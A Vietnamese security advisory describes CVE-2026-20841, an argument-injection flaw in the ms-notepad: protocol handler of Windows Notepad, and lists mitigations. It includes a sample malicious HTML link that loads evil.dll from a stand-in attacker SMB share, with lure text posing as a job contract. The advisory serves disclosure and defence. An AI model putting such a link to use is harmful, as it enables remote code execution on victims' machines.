Trong đợt cập nhật bảo mật vừa qua, Microsoft đã phát hành bản vá cho lỗ hổng thực thi mã từ xa (Remote Code Execution) CVE-2026-20841 trên ứng dụng Windows Notepad hiện đại (UWP/XAML App) được cài đặt sẵn trên Windows 11 và Windows 10.

📋 Chi Tiết Kỹ Thuật Lỗ Hổng:

Mã Lỗ HổngCVE-2026-20841
Điểm CVSS8.4 / High
Cơ Chế Khai ThácProtocol Handler Argument Injection / Improper Input Validation
Ứng Dụng Ảnh HưởngWindows Notepad Package phiên bản trước 11.2408.36.0

1. Nguyên nhân lỗi: Custom URI Scheme và Argument Injection

Khi hiện đại hóa Notepad trên Windows 11 (bổ sung tính năng Tab, Markdown preview và AI trợ giúp), Microsoft đã đăng ký một protocol handler tùy biến dạng ms-notepad: để cho phép các ứng dụng web hoặc file tài liệu mở nhanh nội dung văn bản.

Tuy nhiên, trình xử lý tham số dòng lệnh của tiến trình Notepad.exe không lọc bỏ các cờ (flags) điều khiển nhạy cảm. Kẻ tấn công có thể tạo ra một liên kết HTML hoặc tệp shortcut (.lnk, .url) chứa đường dẫn chế tác đặc biệt:

<!-- Mẫu khai thác liên kết độc hại qua custom protocol -->
<a href="ms-notepad:--plugin-path=\\\\attacker-smb\\share\\evil.dll --auto-load">
  Xem tài liệu hợp đồng tuyển dụng
</a>

Khi người dùng bấm vào liên kết trong trình duyệt (Chrome/Edge), Windows sẽ tự động kích hoạt Notepad với các tham số đi kèm, khiến ứng dụng tải và nạp thư viện DLL độc hại từ xa vào không gian bộ nhớ của tiến trình.

2. Biện pháp phòng ngừa và cập nhật

  1. Cập nhật Notepad qua Microsoft Store: Đảm bảo ứng dụng Windows Notepad được tự động nâng cấp lên phiên bản mới nhất (tối thiểu 11.2408.36.0 trở lên).
  2. Vô hiệu hóa Custom Protocol không cần thiết: Quản trị viên doanh nghiệp có thể tắt protocol ms-notepad: qua chính sách Registry hoặc AppLocker.